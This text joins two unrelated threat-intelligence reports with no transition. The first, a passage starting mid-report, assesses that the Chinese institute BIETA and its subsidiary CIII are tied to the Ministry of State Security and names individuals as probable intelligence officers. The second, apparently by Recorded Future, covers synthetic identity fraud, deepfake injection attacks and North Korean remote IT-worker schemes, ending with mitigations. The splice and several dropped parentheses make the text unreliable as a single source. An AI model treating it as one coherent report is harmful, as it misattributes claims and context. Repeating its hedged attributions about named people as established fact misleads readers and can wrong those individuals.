Given BIETA’s almost certain affiliation with the MSS, as well as the remit of the MSS and wider state security apparatus to investigate and mitigate domestic and foreign threats to the Chinese Communist Party (CCP) and China, it is almost certain that the organization’s research directly or indirectly enables MSS operations across a range of activities. It is noteworthy in this context that BIETA contracted project(s) with NSFocus (北京神州绿盟信息安全科技股份有限公司) between 2013 and 2017. The nature of the project or projects is unknown, but NSFocus is among China’s leading cybersecurity companies and the first founded by early patriotic hackers (specifically those associated with the “Green Army”).

Ties to the MSS

The assessment that BIETA is almost certainly affiliated with the MSS, very likely led by the MSS, and likely a front for the MSS First Research Institute is primarily supported by evidence that several of BIETA’s personnel (with varying degrees of certainty) are MSS officers, research staff, or otherwise affiliated with China’s principal intelligence service. The assessment is also supported by BIETA’s engagement with an MSS-subordinate university, the University of International Relations (UIR; 国际关系学院).

Personnel

Though the MSS is a highly secretive organization, at least four BIETA personnel have clear or potential links to the MSS, based on publicly available information. This supports the assessment that BIETA itself is almost certainly affiliated with China’s principal civilian intelligence service. Of more than twenty individuals currently or formerly affiliated with BIETA, at least three individuals are almost certainly or very likely MSS personnel. There is evidence that points to one other BIETA employee having a possible MSS affiliation. The evidence linking these personnel to the MSS is surveyed below.

Wu Shizhong (吴世忠)

Figure 2: Wu Shizhong (Source: Cyberspace Administration of China)

Multiple public profiles identify Wu Shizhong as a BIETA researcher, one profile from as early as 2011. In 2009, and likely as late as 2016, Wu Shizhong was the head of the “MSS Science and Technology Bureau” (国家安全部科技局). Between 2005 and 2013, Wu was also the director of the China Information Technology Security Evaluation Center (CNITSEC; 中国信息安全测评中心). Wu was further the secretary of CNITSEC’s CCP committee between 2014 and 2018. CNITSEC is almost certainly a public face of the MSS’s former 13th Bureau that specialized (in part) in network security and exploitation. According to one profile, Wu was employed at BIETA while also holding directorship of CNITSEC. Wu’s background supports the assessment that BIETA is almost certainly affiliated with the MSS.

He Dequan (何德全)

Figure 3: He Dequan (Source: Shanghai Jiao Tong University)

Beginning in 1983 — the year the MSS was created — He Dequan was almost certainly employed as a senior engineer at BIETA. Academic publications indicate that, as late as 2009, He still used a BIETA affiliation. He was almost certainly a career intelligence officer in China, prior to and after the MSS’s establishment. In 1983, He was also deputy bureau chief (副局长) for “some security department” (某安全部) and a researcher with and director of the Beijing Information Technology Research Institute (BITRI; 北京信息技术应用研究所). Although public profiles do not explicitly say that from 1983 to 2000, He was employed with the MSS, he won a “Ministry of State Security Science and Technology Advancement Award” (国家安全部科技进步奖) in 1989, supporting this conclusion. He’s links to the MSS are also seen in his consulting position with CNITSEC. Further, he has had an advisory role with the China International Public Relations Association (中国国际公共关系协会), an outwardly Ministry of Foreign Affairs-affiliated organization that is reportedly run by the MSS and used by MSS officers to interact with multinational corporations. Moreover, He’s BITRI affiliation is notable because this research organization has had other employees associated with the MSS. Specifically, BITRI appears in the work history of former Huawei executive Sun Yafang (孙亚芳), who worked for the MSS in a role related to communications after college. He’s background supports the assessment that BIETA is almost certainly affiliated with the MSS and that BIETA is very likely led by the MSS.

You Xingang (尤新刚)
You Xingang has published academic research using a BIETA affiliation since at least 2001. You was the head of BIETA between 2008 and 2023. You is very likely an MSS officer. In 2012, You was described as a CNITSEC deputy director. References from 2018 and 2019 continue to affiliate You with CNITSEC in an unspecified capacity. Furthermore, in 2003, an individual named You Xingang was awarded a China Youth Science and Technology Innovation Award (中国青年科技创新奖) and identified as a researcher with the MSS First Research Institute (国家安全部第一研究所). This You is likely BIETA’s You Xingang. Having reportedly graduated from university in 1984, BIETA’s You would likely have been around the age of 39 at the time of the award and therefore eligible for it. Evidence supporting the assessment that BIETA is likely a front for MSS First Research Institute are indications that the MSS First Research Institute’s activities overlap with those of BIETA. A patent filed in 2007 references the MSS First Research Institute as having tested an “MT-type nickel-based conductive coating … used for electromagnetic wave shielding." Correspondingly, BIETA has an Electromagnetic Compatible Technology Research Lab (电磁兼容技术研究室) and conducts research into electromagnetic signal security protection technology. You’s background supports the assessment that BIETA is almost certainly affiliated with the MSS, very likely led by the MSS, and likely a public front for the MSS First Research Institute.

Zhou Linna (周琳娜)

Figure 4: Zhou Linna (Source: UIR School of Cyber Science and Engineering)

Zhou Linna reportedly worked at BIETA between 1999 and approximately 2017, publishing academic research under this affiliation at least as late as 2011. Evidence supports an assessment that Zhou may also be an MSS officer or otherwise affiliated with the intelligence service. First, Zhou is a professor with the MSS-subordinate UIR. As early as 2017, she was, more specifically, identified as the dean of UIR’s School of Information Science and Technology (信息科技学院; now the School of Cyber Science and Engineering [网络空间安全学院]). An individual named Zhou Linna was also recognized in 2017 among the recipients of the Central State Institutions Ninth National Five Good Civilized Household Award (中央国家机关第九届全国五好文明家庭获奖) and identified as a member of the MSS (国家安全部干部). As of writing, however, this potential direct reference to BIETA’s Zhou as an MSS member cannot be corroborated through other publicly available information. Zhou’s background supports the assessment that BIETA is almost certainly affiliated with the MSS.

Activities

BIETA’s organizational links and activities in relation to the MSS-subordinate UIR also support the assessment that BIETA is almost certainly affiliated with the MSS. UIR promotional materials for prospective graduate students assert “year-round” and “very close cooperation” between the university and BIETA. Between at least 2011 and 2018, BIETA was a “joint training” partner for the university’s Communications and Information Systems (通信与信息系统) discipline. Specifically, BIETA supported modern communications technology and information security as areas of study. UIR’s School of Cyber Science and Engineering further asserts that it has an “intern base” at BIETA where graduates can attain practical industry experience. UIR’s School of Cyber Science and Engineering only publicly names intern bases at two other organizations, one of which is CNITSEC.

CIII

CIII, also known as Beijing Sanxin Times Technology Co., Ltd., and formerly known as Beijing Sanxin Times Information Company (北京三信时代信息公司), is a technology company established in 1994. CIII is a state-owned enterprise and a subsidiary of BIETA. It is located in Beijing and has offices in Shanghai and Hangzhou (incorporated in October 2023), a likely office in Hong Kong, and former offices (now closed) in Xinjiang. CIII claims its clients include party-state government and military organizations as well as organizations in the broadcasting, finance, environment, insurance, electricity, transport, and oil industries. While CIII has shared several employees with BIETA, publicly available information does not identify links between CIII employees and the MSS. Nevertheless, CIII is also almost certainly affiliated with the MSS through its relationship to BIETA.

On its website, the company claims to be engaged in several disparate activities that include operating an internet data center (IDC) in Beijing; maintaining Beidou Satellite Navigation-enabled platforms for police and campus security organizations; developing enterprise and social applications for Windows, Android, and iOS — including those for uploading files to Baidu Cloud and OneDrive and for genealogy, photography, voice recording, and locating and communicating with friends — and conducting network simulations and penetration testing against websites, mobile applications, enterprise systems, servers, databases, cloud platforms, and internet-of-things equipment. How recently CIII’s website has been updated is unknown, but software copyright registrations indicate activities since 2020 (see Table 1). CIII also registered a copyright for a “mesh detection system” (网眼检测系统) in 2017 and a “penetration testing analysis system” (渗透测试分析系统) in 2013.

Summary

Synthetic identities — digital personas crafted from real and fabricated data — represent a dual threat to enterprises, enabling large-scale financial fraud, while also facilitating state-sponsored sanctions evasion, illicit revenue generation, and intellectual property IP) theft.

Advances in generative AI GenAI) and deepfake technology mean adversaries can create highly convincing synthetic personas which, when combined with social engineering and injection-based techniques, can evade know-your-customer KYC) checks and biometric liveness detection.

To withstand this threat, organizations must adopt a more rigorous approach to identity verification and remote work security, ensuring that every identity, interaction, and transaction is continuously validated.

Figure 1: Synthetic Identities: Key Statistics (Source: Recorded Future)

Synthetic Identities: A Dual Threat

Synthetic identity fraud SIF) is one of the fastest-growing categories of financial crime. It involves creating a fake identity by combining legitimate information (for example, stolen Social Security numbers or driverʼs license data) with fabricated information (such as made-up names, dates of birth, or addresses). The result is an identity that appears real on paper but does not represent an actual person.

Criminals typically build up synthetic personas over time, opening bank accounts and establishing credit histories until they can secure large loans. Because no real victim exists to raise an alarm, and some components of the identity are legitimate, traditional fraud detection methods often fail to recognize SIF. Once the funds are obtained, the criminals can disappear, leaving financial institutions to absorb the losses.

Beyond financial fraud, synthetic identities have also evolved into a vehicle for insider threats. Adversaries are increasingly using them to enter organizations as remote employees or contractors, gaining legitimate digital credentials and access privileges. This is particularly dangerous because there is no real individual behind the profile to monitor, yet they operate with the same trust as genuine insiders.

Generative AI A Force Multiplier

SIF is accelerating at an unprecedented pace. In Q1 2025 alone, synthetic identity document fraud rose by 300%, while deepfake-enabled fraud has increased more than tenfold since the start of 2024. This escalation is fueled by the widespread availability of free, easy-to-use AI tools and services, which enable even unskilled criminals to generate convincing passports, ID documents, and even synthetic biometric data such as facial images, fingerprints, and iris patterns.

The most alarming development is the rise in deepfake injection attacks, which in 2024, spiked by 783% from 2023. Unlike traditional presentation attacks that replay manipulated media on a screen, injection attacks feed synthetic media directly into the verification pipeline. This makes it appear as if data is captured live by the userʼs device, enabling adversaries to animate synthetic identities in real time. These techniques have already proven successful at breaching KYC safeguards and infiltrating organizations through remote hiring channels.

Case Study: North Korean IT Employment Scam

Figure 2: Original Photo (Left) And AI Fake (Right) Used By A North Korean Threat Actor Who Posed As A Us-Based Software Engineer And Was Hired By Cybersecurity Firm Knowbe4 (Source: Knowbe4)

The most striking example of synthetic identity abuse is North Koreaʼs IT employment scheme, which Insikt Group tracks as PurpleDelta. While not every case involves fully synthetic identities, many operators have combined stolen personal identifiers or identities “loanedˮ by paid facilitators, with fabricated profiles across LinkedIn, GitHub, and other social media and job boards, to secure remote jobs or contractor roles at US firms. Evidence also indicates the use of deepfake injection techniques to pass remote hiring processes. Once hired, they often work through “laptop farmsˮ — clusters of devices run by accomplices configured to mimic local employees and blend seamlessly into enterprise networks.

This scheme has proven highly effective, with confirmed infiltrations affecting at least 64 US companies and numerous reports indicating the true number may be significantly higher. Targets have included leading technology firms such as SentinelOne and Google, US government contractors including NASA's Jet Propulsion Lab, and multiple Fortune 500 enterprises. Each worker is estimated to generate up to $300,000 annually, funneling millions to the North Korean regime while also providing potential access to intellectual property, sensitive data, and persistent footholds across global IT supply chains.

Why Detection is Failing

Despite increased awareness around synthetic identities, both technological and human defenses remain inadequate. Independent testing shows that many identity verification platforms overstate their ability to detect deepfakes, particularly injection attacks. This gap between marketed capabilities and real protection exposes organizations to risk while fostering a false sense of security. The problem is compounded by knowledge gaps: The 2025 RSA ID IQ5 Report revealed that nearly half of respondents failed basic identity security questions, with identity and access management IAM) and cybersecurity professionals performing worst of all.

Human detection is equally unreliable. A 2025 study revealed that only 0.1% of participants could correctly identify all synthetic media, with fewer than one in ten recognizing deepfake videos. One-third of adults over 55 had never heard of deepfakes, while younger adults 1834) showed misplaced confidence despite poor detection rates. Even when individuals correctly identify synthetic media, awareness and reporting rates remain low across enterprises, with 29% of employees admitting they would take no action at all. Together, these weaknesses reveal a society and workforce unprepared for the growing threat of synthetic identities.

Figure 3: Human Deepfake Detection Statistics (Source: iProov)

Risks for Enterprise: Sanctions, Spies, and Stolen IP

The rise of synthetic identities underscores a shift in adversary behaviour from targeting individual consumers to exploiting enterprises. Threat actors are increasingly abusing remote hiring, digital identity verification, and executive communications to achieve higher-value payouts. This evolution carries severe financial consequences: Across the US, identity-related crimes cost businesses $8.8 billion in 2022, with an average loss of $4.24 million per incident. Projections suggest that SIF alone could drive annual losses of $58.3 billion by 2030.

Figure 4: Direct Costs of Identity Attacks (Source: FTC; Juniper)

Beyond immediate financial loss, employing sanctioned individuals, even unknowingly, exposes organizations to regulatory fines of up to $377,700 per violation or twice the value of the transaction (whichever is greater), as well as criminal penalties of up to $1 million and twenty yearsʼ imprisonment for willful breaches. For example, if a company paid a disguised North Korean IT worker $500,000 in wages, the civil penalty alone could reach $1 million, with far greater consequences if the violation were deemed egregious.

Figure 5: Hidden Costs of Synthetic Identity Attacks (Source: Recorded Future)

Employing malicious operatives also presents a critical risk to organizations' IP and internal security. Operators exploiting fake or stolen identities have infiltrated US companies, with at least one being a California defense contractor, and siphoned confidential technical data and virtual currency. Such breaches erode competitive advantage, especially in high-value sectors like defense and advanced technology. Increasingly, these incidents are now extending into extortion, with threat actors stealing sensitive information and demanding payment to avoid public exposure.

Outlook

Distinguishing between real and synthetic humans will likely become a core challenge for businesses and governments. Fraudsters will continue to create digital personas blending stolen personally identifiable information PII, AI-generated data, and fabricated activity histories. With deepfake-enabled video and voice, these identities will not only exist on paper, they will “show upˮ in onboarding calls, customer service interactions, and social media networks.

State-sponsored infiltration via synthetic hiring will likely expand. Other adversarial states, such as China and Iran, could seek to replicate North Koreaʼs playbook as a low-cost, high-reward strategy for sanctions evasion, espionage, and financial gain. This will make insider risk and supply chain integrity critical national security issues.

Governments will almost certainly tighten identity verification and sanctions compliance requirements. Identity verification standards will almost certainly become procurement-critical in regulated private sector industries such as finance, defense, and technology, with companies facing more rigorous audits, mandatory adoption of advanced screening tools, and increased liability for failing to detect synthetic identities.

Identity management will likely evolve into a zero-trust model, where every interaction is actively validated. Static verification methods (passwords, ID scans, one-time biometrics) will likely become obsolete. Enterprises will be forced to adopt continuous, multi-layered trust models that include behavioral biometrics, device trust signals, cryptographic watermarking of media, and secondary verification channels.

Mitigations

Secure Identity with AI: While AI amplifies the risks associated with synthetic identities, it can also be part of the solution. Organizations should deploy AI-powered detection platforms capable of identifying injection-based attacks, manipulated biometrics, and fraudulent credential trails in real time. Continuous anomaly monitoring of employee behavior and access patterns should complement identity screening. Extend this to detect unauthorized use of remote access or remote monitoring tools (such as AnyDesk and TeamViewer), which may indicate laptop farm connections or misrepresented work locations. Recorded Futureʼs Identity Intelligence can help to detect compromised credentials that may be used in SIF.

Govern Remote Hiring and Access: Refuse to provision hardware or network access until in-person or notarized identity validation is complete, particularly for high-risk roles. Incorporate multi-factor biometric authentication and liveness checks into hiring and onboarding. Escalate suspicious resumes or hiring signals early, treating talent acquisition as part of the security perimeter. Align practices with MITRE D3FEND techniques such as Process Access Pattern Analysis D3PAPA and Remote Access Detection D3RAD to harden against covert access attempts.

Integrate Threat Intelligence into Identity Workflows: Use Recorded Futureʼs Threat Intelligence to track fraudulent digital identities, laptop farms, and infiltration schemes linked to state-backed adversaries. Feed this intelligence into HR, compliance, and SecOps workflows.

Transition to Continuous, Zero-Trust Identity Models: Move beyond static verification to continuous, multi-layered trust models. Combine behavioral biometrics, device trust scoring, cryptographic watermarking of media, and secondary verification channels. Adopt a “never trust, always verifyˮ approach across all high-value digital interactions.

Risk Scenario

Scenario: A Fortune 500 technology company unknowingly hires a synthetic persona linked to a North Korean operator. Over time, the operative gains elevated access, siphons proprietary IP, and compromises supply chains.